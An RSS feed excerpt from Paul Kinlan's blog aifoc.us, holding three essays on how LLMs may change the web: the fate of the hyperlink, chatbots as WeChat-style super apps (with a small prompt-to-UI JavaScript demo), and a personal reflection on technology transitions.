&lt;p>The web has a lot going for it. We coined the term &lt;a href="https://paul.kinlan.me/slice-the-web/">SLICE&lt;/a> (Secure, Linkable, Indexable, Composable, and Ephemeral) to describe its benefits, but at its purest essence the hyperlink is the thing that makes the web the web. It&amp;rsquo;s a thing of beauty. It&amp;rsquo;s why I fell in love with the Web. Click. Something new! It&amp;rsquo;s why I still love the web and it&amp;rsquo;s the thing that is unique to the medium because the web platform in a lot of cases has a thing at the end of it, yes there is link-rot, but you don&amp;rsquo;t have to install anything to get it running.&lt;/p></description><content:encoded><![CDATA[<blockquote>
<p>I&rsquo;ll keep playing here while the rest of you flirt with apps. I&rsquo;ll be here when you come back. I know it&rsquo;s going to happen. Here&rsquo;s why.</p>
<p>Linking.</p></blockquote>
<p><a href="http://scripting.com/stories/2011/12/13/whyAppsAreNotTheFuture.html#p11405">Dave Winer - 2011</a></p>
<p>The web has a lot going for it. We coined the term <a href="https://paul.kinlan.me/slice-the-web/">SLICE</a> (Secure, Linkable, Indexable, Composable, and Ephemeral) to describe its benefits, but at its purest essence the hyperlink is the thing that makes the web the web. It&rsquo;s a thing of beauty. It&rsquo;s why I fell in love with the Web. Click. Something new! It&rsquo;s why I still love the web and it&rsquo;s the thing that is unique to the medium because the web platform in a lot of cases has a thing at the end of it, yes there is link-rot, but you don&rsquo;t have to install anything to get it running.</p>
<aside>
I decided to look for the genesis of the phrase "The web will always win" and it turns out the earliest quote still indexed is a post linking to Dave Winer's post where he doesn't actually directly say it (it's implied).
</aside>
<p>But there&rsquo;s something bugging me. It&rsquo;s the over-confidence of the industry that the web will weather any storm. &ldquo;The web will always win&rdquo; is often quoted whenever someone poses that there is an existential threat to the web and the other side doesn&rsquo;t think any of the proposals to address the challenge are needed.</p>
<p>Mobile and the rise of native apps was one of those challenges that I believe was a potential extinction-level event for the web. The web as experienced by people didn&rsquo;t work well on mobile and people looked for Apps (they were told it, &ldquo;There&rsquo;s an app for that&rdquo;). At the same time billions of people were getting their first computing experience through a mobile device and the web wasn&rsquo;t something they had grown up around, it just didn&rsquo;t even occur to them as a thing that they should do.</p>
<p>Yes, Apple through Safari introduced many technologies that would let the web work well on mobile (e.g viewports, touch, multi-touch, media queries are probably the biggest innovations at the time) but web developers just didn&rsquo;t shift to match the expectation people had from their mobile devices.</p>
<p>We needed a change in how we thought about the web and how it should be used it for this new context. From my own personal experience, it wasn&rsquo;t until a Google &ldquo;mobile-first&rdquo; push in 2015 that you really started to see a change in how the web was experienced on mobile.</p>
<p>As I look at my own usage of LLMs today, there is a change in how I use the web and I am uneasy, but it wasn&rsquo;t until recently that I was able to put my finger on it. Yes, as the cost of creating content drops because people use LLMs it enables a lot more low-quality content to be created and at the same time it is also enabling a lot of good experiences to be easily created (the structure of this very blog was made using an LLM), but the only way you get to discover and experience content is if you can navigate to it.</p>
<p>I was chatting with a colleague about the intersection of AI tooling and the web and the following thought popped into my mind &ldquo;If you had a machine that could instantly recall or create any facet of information, do you need a link?&rdquo;</p>
<p>It&rsquo;s the link that I am worried about and I now think about this constantly.</p>
<p>The way that we — the people who build sites — create links is as a way of saying &ldquo;I think this is important&rdquo;. &ldquo;I think this is related or has more context&rdquo;. &ldquo;I think you should look at this&rdquo;. And what we know as a hyperlink, a thin blue line underneath some text made by wrapping it in an <code>&lt;a&gt;</code> tag connecting two documents together via a directed graph structure is just a construct of the technology that renders web pages.</p>
<p>What I am experiencing doesn&rsquo;t feel a million miles away from the original definition of hypertext. The idea that you could have a machine that could recall any piece of information and then connect it with any other piece of text. Specifically, <a href="https://en.wikipedia.org/wiki/Transclusion">Transclusions</a> feel pretty close to where I see LLMs going.</p>
<blockquote>
<p>In computer science, transclusion is the inclusion of part or all of an electronic document into one or more other documents by reference via hypertext. Transclusion is usually performed when the referencing document is displayed, and is normally automatic and transparent to the end user.[1] The result of transclusion is a single integrated document made of parts assembled dynamically from separate sources, possibly stored on different computers in disparate places. <em>The result of transclusion is a single integrated document made of parts assembled dynamically from separate sources, possibly stored on different computers in disparate places.</em></p></blockquote>
<p>Emphasis mine — <a href="https://en.wikipedia.org/wiki/Transclusion">Transclusions</a></p>
<p>It feels like the directed edge that defines a link in this massive directed graph that we know as the web is changing as LLM&rsquo;s seem to be able to connect concepts across many documents and just merge them into the response.</p>
<p>This directed graph nature of the web has been fundamental to how we experience the web. It enables things like Page Rank to exist, which to my understanding has the link imply some level of authority. Its unclear to me if this is of any importance to a LLM. Is the link just a way to point a web-crawler to another page so it can be ingested? If so, then is the only way to have an LLM not ingest your content is to make it undiscoverable? Maybe it&rsquo;s to put it behind a login wall. This feels like a big step backwards on both fronts, however with things like Substack and Medium, the latter seems to be the ways it&rsquo;s going.</p>
<p>The link can still point to content in the open or content that is private behind a login and enable instant access to any experience. So we still have that for now, but in is a world where <a href="/super-apps/">LLMs become the super app</a> because they can recall and generate content and functionality in an instant, then what next?</p>
<p>I&rsquo;m not sure if it&rsquo;s a technology problem (i.e, links need to change) or if like the mobile-first push we <em>just</em> need to work out where the web fits in the grand scheme of things, but I don&rsquo;t believe that the &ldquo;Web will always win&rdquo; is a good enough answer.</p>
<p>Maybe we always just need to ask LLMs to include citations. Maybe we need to redefine what a link is. Maybe we need to rethink the capabilities of the platform. Maybe we need to create more incentives for putting content on the open web and linking to it directly.</p>
<p>This is something that I want to explore more in the future and I don&rsquo;t want to sit idly by and be react in 5 years like we did with mobile. I want to be proactive and help shape the future of the web.</p>
]]></content:encoded></item><item><title>super-apps</title><link>https://aifoc.us/super-apps/</link><pubDate>Mon, 12 May 2025 12:05:38 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/super-apps/</guid><description>&lt;p>I’ve spent two weeks in April wandering around Japan with my wife, daughter and parents - it was incredible. I used a browser twice. Most of the time that I spent with my phone wasn’t on the web or in traditional apps, it was in a LLM.&lt;/p>
&lt;p>I would give the LLM photos of packets of food and ask what it is and it would handily tell me the brand, and then I could follow up and with a photo of the back of the packet and ask if there was milk in it (my daughter can’t drink milk), and it would explain the ingredients and potential allergens&amp;hellip;. Given my non-existent ability to read Japanese I had to trust the LLM.&lt;/p></description><content:encoded><![CDATA[<p>I’ve spent two weeks in April wandering around Japan with my wife, daughter and parents - it was incredible. I used a browser twice. Most of the time that I spent with my phone wasn’t on the web or in traditional apps, it was in a LLM.</p>
<p>I would give the LLM photos of packets of food and ask what it is and it would handily tell me the brand, and then I could follow up and with a photo of the back of the packet and ask if there was milk in it (my daughter can’t drink milk), and it would explain the ingredients and potential allergens&hellip;. Given my non-existent ability to read Japanese I had to trust the LLM.</p>
<p>We went to Kyoto and I would ask the LLM what was written on the noticeboard of the shrine and what the cultural importance of it was, and it would tell me. I sat on a tourist train trundling through a valley pointing my camera at something that looked like a nuclear reactor - turns out it was a stadium.</p>
<p>While waiting outside a pharmacy I would ask the LLM to tell me the latest news about the local area and it would present a quick overview of what had happened in English from Japanese sources.</p>
<p>As I wandered around Himeji castle and had questions, I could just check the LLM. As I saw the fish gargoyles that adorn each of the roofs on the castle, I could ask what they were and their cultural relevance and get a comprehensive answer. A lot more than I could from the placards I dotted around the site.</p>
<p>As we were riding the Shinkansen back to Tokyo I wondered how many sites were blocking LLM’s User-Agents, so I asked Gemini to build a script that would check (and copied it into my Android Linux terminal - it didn’t work, python wasn’t installed, but it was so close).</p>
<p>I rarely left these tools and it&rsquo;s been on my mind a lot.</p>
<p>A couple of months ago I had two ideas running around my head. The first was me musing if it was possible to have a future programming language built around prompts, and the second was will it be possible to build UIs based on a goal. Combining the two ideas I created a little toy-library called <code>f</code> and a demo that would build a UI for a site based on a request to a JSON API using as plain-english as I can currently get. I was blown away by how far you can get by describing your goals. Want a form that collects data? Great, just describe it! Want a UI built for a random API? Just point it at the data and ask it to build the UI.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-javascript" data-lang="javascript"><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">getSpaceData</span> <span style="color:#f92672">=</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">f</span><span style="color:#e6db74">`fetch JSON from https://api.spaceflightnewsapi.net/v4/articles/`</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">news</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">getSpaceData</span>();
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// Describe the data structure so the the UI prompt has a better idea of what to build.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">generateSchema</span> <span style="color:#f92672">=</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">f</span><span style="color:#e6db74">`Return a JSON Schema for a given object. The schema should be in the format defined in https://json-schema.org/understanding-json-schema/reference/object.html and should include all the properties of the object. The schema should include the type of the property, the format of the property, the required status of the property, and the description of the property. The schema should include all the properties of the object. The schema should include the type of the property, the format of the property, the required status of the property, and the description of the property.`</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// Describe the data
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">schemeDescription</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">generateSchema</span>(<span style="color:#a6e22e">spaceData</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">buildSpaceUI</span> <span style="color:#f92672">=</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">f</span><span style="color:#e6db74">`Using the data defined in &lt;output&gt; create a UI that will best display the space flight information. The developer will provide the data as a parameter and it will be in the format defined in &lt;output&gt;.
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&lt;output&gt;</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">JSON</span>.<span style="color:#a6e22e">stringify</span>(<span style="color:#a6e22e">schemeDescription</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">&lt;/output&gt;`</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>document.<span style="color:#a6e22e">body</span>.<span style="color:#a6e22e">appendChild</span>(<span style="color:#a6e22e">buildSpaceUI</span>(<span style="color:#a6e22e">spaceData</span>));
</span></span></code></pre></div><figure><img src="/images/f.png"
    alt="f"><figcaption>
      <p>Dynamically generated UI from prompts</p>
    </figcaption>
</figure>

<p>So why is Japan and ‘f’ in the same article?</p>
<p>I had to work for two days on this vacation and I was relating my use of Gemini and ChatGPT to a friend about how every time I go to China show me how pervasive WeChat is across people&rsquo;s lives. Gemini and ChatGPT were my super-app. Yes, on this trip I wasn’t ordering food, cars, laundry or anything else, but for my needs both Gemini and ChatGPT gave me everything I needed. Translations, background information, local-news, and even a bit of work that I needed to think about.</p>
<p>In that conversation, I was describing the experience of how I took a photo of a nuclear reactor and ChatGPT built a little program that scanned and panned the image to find where I was and what I was looking at. It built a mini application to solve the problem (see below) and it hit me&hellip;.</p>
<figure><img src="/images/chatgpt-scan-1.png"
    alt="WeChat"><figcaption>
      <p>Chat GPT thinking and building - part 1</p>
    </figcaption>
</figure>

<figure><img src="/images/chatgpt-scan-2.png"
    alt="WeChat"><figcaption>
      <p>Chat GPT thinking and building - part 2</p>
    </figcaption>
</figure>

<p>We’re not far away from tasks, be it expressed via text replies and &ldquo;thinking tokens&rdquo; or dynamic UI&rsquo;s and applications that are built to service a single user requests from directly inside the LLM.</p>
<p>I started to describe this in &ldquo;<a href="https://paul.kinlan.me/the-disposable-web/">The Disposable Web</a>&rdquo;, that it is becoming easier to create software that solves one problem once. And when I compare what can be created today in the canvases of these tools against many of the run-of-the-mill CRUD style experiences that operate inside WeChat and it feels easy (for me at least) to draw a connection that we are not far away from getting these applications built dynamically inside a LLM to service the need for the user, and when that happens, what’s next for the web?</p>
<p>Many of the apps inside WeChat are not incredibly complex, they are run-of-the-mill CRUD style experiences. We’re really not far away from getting these built dynamically and when that happens, what’s next for the web? I can see a straight line between WeChat and the experience I had in Gemini and ChatGPT. Yes, the experience in ChatGPT took a while to create (according to the “thinking” timing, it was over 90 seconds) and today it is far too slow for applications as we know it. If we use the Jacob Nielsen research <a href="https://jakobnielsenphd.substack.com/p/time-scale-ux#:~:text=0.1%20seconds%20(100%20ms)%20creates%20the%20illusion%20of%20instantaneous%20response">&ldquo;0.1 seconds (100 ms) creates the illusion of instantaneous response&rdquo; (2025)</a> as a target, then it looks like we have to make a 100 fold improvement to token generation to build blocking-free UI. How many Tokens/s do we need to make things feel instant? I think that might come sooner rather than later, model improvements seem inevitable and hardware improvements like Groq are showing that there is already a path.</p>
<p>HTML, CSS and JavaScript are the most expressive languages available today to render a UI and LLMs are pretty good today at generating them, so to me there is a world where this will be the easiest route to build UI that will service the specific needs of a user request directly in one of these LLMs and you rarely ever need to leave.</p>
<p>If you combine this with Agent communication protocols like MCP which are changing the way that we chain more complex apps and tasks together, it really feels like we are at the start of a major <a href="/transition/">transition</a> in computation and user interaction.</p>
<p>I argue pretty strongly that the web’s super power is the link. It lets anyone click on it and then navigate to an experience. App platforms would kill for this power because today their restrictive review process and restriction on what can run in their sandboxes (there are limits to what they allow developers to run dynamically - e.g, iOS relatively recently allowed none browsers to run dynamic JS). Tools like ChatGPT are doing an end-run around this restriction and to me the power of the link is in question. Who needs a link anymore when you can recall any text or will any experience into existence?</p>
<p>HTML and JavaScript are the most expressive languages to render a UI. It’s not a stretch for a UI to be created to service the specific needs of a user request, or when an Agent wants some form of human input. If any application can do this, then what is the future for web apps? Will apps just live inside these apps like mini-apps live inside WeChat? Should the Web Platform engineers at browser companies invest more in in-app experiences (i.e, WebView)? Should we as an industry do more to enable any website in the browser to do the same?</p>
<p>There&rsquo;s a lot the web can already do to be the primary platform for this type of experience&hellip; We have sand-boxing for arbitrary code execution be it JS or any other flavour with WASM. We have the ability to run arbitrary code in a webview, and we have the ability to run arbitrary code in a web worker away from the UI. I wonder if there will be a future where we pull in small parts of existing web app&rsquo;s DOM and run them inside a new super-app, <a href="https://paul.kinlan.me/custom-elements-ecosystem/#:~:text=Platforms%20as%20the%20decider%20of%20the%20component%20suite">or even define custom-element contracts</a> that will enable us to load widgets from other sites and enable &ldquo;my&rdquo; UI to be surfaced in the app.</p>
<p>I actually don’t know where the future will go, but the recent experiences that I’ve had lean me towards Gemini or ChatGPT being a new type of <a href="https://paul.kinlan.me/the-headless-web/">headless web</a> and I don’t think we are far away from having the everything app for the west?</p>
<p>Who needs a browser anymore?</p>
]]></content:encoded></item><item><title>transition</title><link>https://aifoc.us/transition/</link><pubDate>Fri, 09 May 2025 19:05:38 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/transition/</guid><description>&lt;p>I remember the exact moments when major transitions in my life happened. The first time I got a BASIC program working. The first time someone used one of my programs. My first email. The first time I visited a website. The first time I made a website. The first time I saw my future wife. The first time I held each of my children.&lt;/p>
&lt;p>In each of these moments, I knew things changed and at the same time I had no comprehension of how they would change the direction of my life. It is like there was a fog in front of me, I could see vague outlines of things.&lt;/p></description><content:encoded><![CDATA[<p>I remember the exact moments when major transitions in my life happened. The first time I got a BASIC program working. The first time someone used one of my programs. My first email. The first time I visited a website. The first time I made a website. The first time I saw my future wife. The first time I held each of my children.</p>
<p>In each of these moments, I knew things changed and at the same time I had no comprehension of how they would change the direction of my life. It is like there was a fog in front of me, I could see vague outlines of things.</p>
<p>When I look back on my career as a Web Developer, I&rsquo;ve been involved in many major transitions: The Web being a thing that you had to care about; Dial-up to Broadband enabling a step-change in the types of experiences we could interact with; The Desktop to Mobile transition and all the change that this brought for the web - At Google we felt that we had to go bring the web to mobile, so I focused on Mobile-first as a primary motivator, then a push on Progressive Web Apps as the way that all apps should be built and experienced.</p>
<p>Through these later transitions I felt I could clearly see the path that I or my teams should take. Getting my hands on an iPhone and instantly it felt clear to me that the web needed to work well on mobile because this is where the future will be. Later given the growth of mobile and the fact that for billions of people it was their first experience with a computer it was quickly obvious. It felt clear that there was an existential risk to the web and that there would need to be a solutions for the centralization of Apps - which our solution would become &ldquo;Progressive Web Apps&rdquo; - it all felt pretty clear.</p>
<p>But each of these transitions to the web wrought a lot of change.</p>
<ul>
<li>Dial-up to Broadband - The web became a desktop-class hosting platform for applications and fundamentally changed how Windows worked, leading to the rise of Web aggregators like Google, and the creation of services like YouTube, all because the increase in bandwidth and reduction in latency meant that you could do surf more and developers could deliver more. Many of the services we once relied on (anyone remember MapQuest?) were obliterated nearly over night by more interactive and engaging services. Always being on meant always having access to email, instant messaging, social, Flash games, audio and video.</li>
<li>Desktop to Mobile - You could see the web just not working well on iPhone-like mobile devices, and while it took a bit of time for Apps to find their mobile-first footing (i.e, not just a port of the Desktop experience) the web clearly took a lot longer to be mobile-first, or even responsive. Yes, Responsive design had been around prior to the launch of the iPhone, but it wasn&rsquo;t <a href="https://paul.kinlan.me/future-of-web-on-mobile-coldfront-conf/#:~:text=Late%20last%20year,not%20%22Mobile%20Friendly%22.">until 2015</a> when Google search started a mobile-first push that the ecosystem really started to move. My own involvement in this project started a lot earlier as I could see an explosive growth of mobile because of reductions in price of the device and massive improvements to connectivity in India and China meant that people&rsquo;s first computing devices might never highlight the web.</li>
</ul>
<p>Some people see the transition far ahead of time. I had friends who built a web browser for Windows CE because they saw the rise of Nokia phones and could see the next jump to a more powerful experience and wanted to ensure that web worked well on these devices. I didn&rsquo;t see that then, I just saw terrible WAP sites. However, I could feel the change with the iPhone.</p>
<p>It was the same with LLMs. The first time that I used an LLM was in the OpenAI playground&hellip; I believe it was GPT 2, and I just didn&rsquo;t think that this was going to be a fundamental shift in the way that we interact with computers. I couldn&rsquo;t see how this was going to change the way that we interacted with the web. I didn&rsquo;t see how this would change how I build software almost overnight. I just couldn&rsquo;t see how this was could change the way that we interacted with our devices.</p>
<p>I remember thinking: &ldquo;That&rsquo;s a neat trick&rdquo;. And then I got on with my life.</p>
<p>Like many people, I think this changed when we first played with ChatGPT. It wasn&rsquo;t perfect, it was slow, but I got it building a simple web app in a few minutes and I could feel that this had the potential to change the way that I work and the way that people interact with computers. I remember clear as day, sitting next to my wife on the couch saying that everything is going to change.</p>
<p>It feels clear that we are in the midst of another major transition, and I&rsquo;m at a personal transition. I&rsquo;m at a point where I was thinking about what I want to do next with what I think will be the next huge shift for computing. I&rsquo;ve been working on the web nearly 30 years and working at Google for 15 of those and my fundamental question is: What is going to happen to the web?</p>
<p>What I do know is that I love the web, I think it&rsquo;s the best platform to write once and reach everyone. I love seeing that the web is the place where people are experimenting with the entire range of delivery of AI experiences to people, be it access to Large Language Models, Image Segmentation, Video analysis, or even new flavours of search.</p>
<p>I want to be at the forefront of the medium that is the web, and the potential new platform that is &ldquo;AI&rdquo; (we need a much better name) and <a href="https://aifoc.us">aifoc.us</a> is my own personal place to muse on a lot of questions about this transition.</p>
<p>ps, Blame Barry Pollard for this domain name.</p>
]]></content:encoded></item></channel></rss>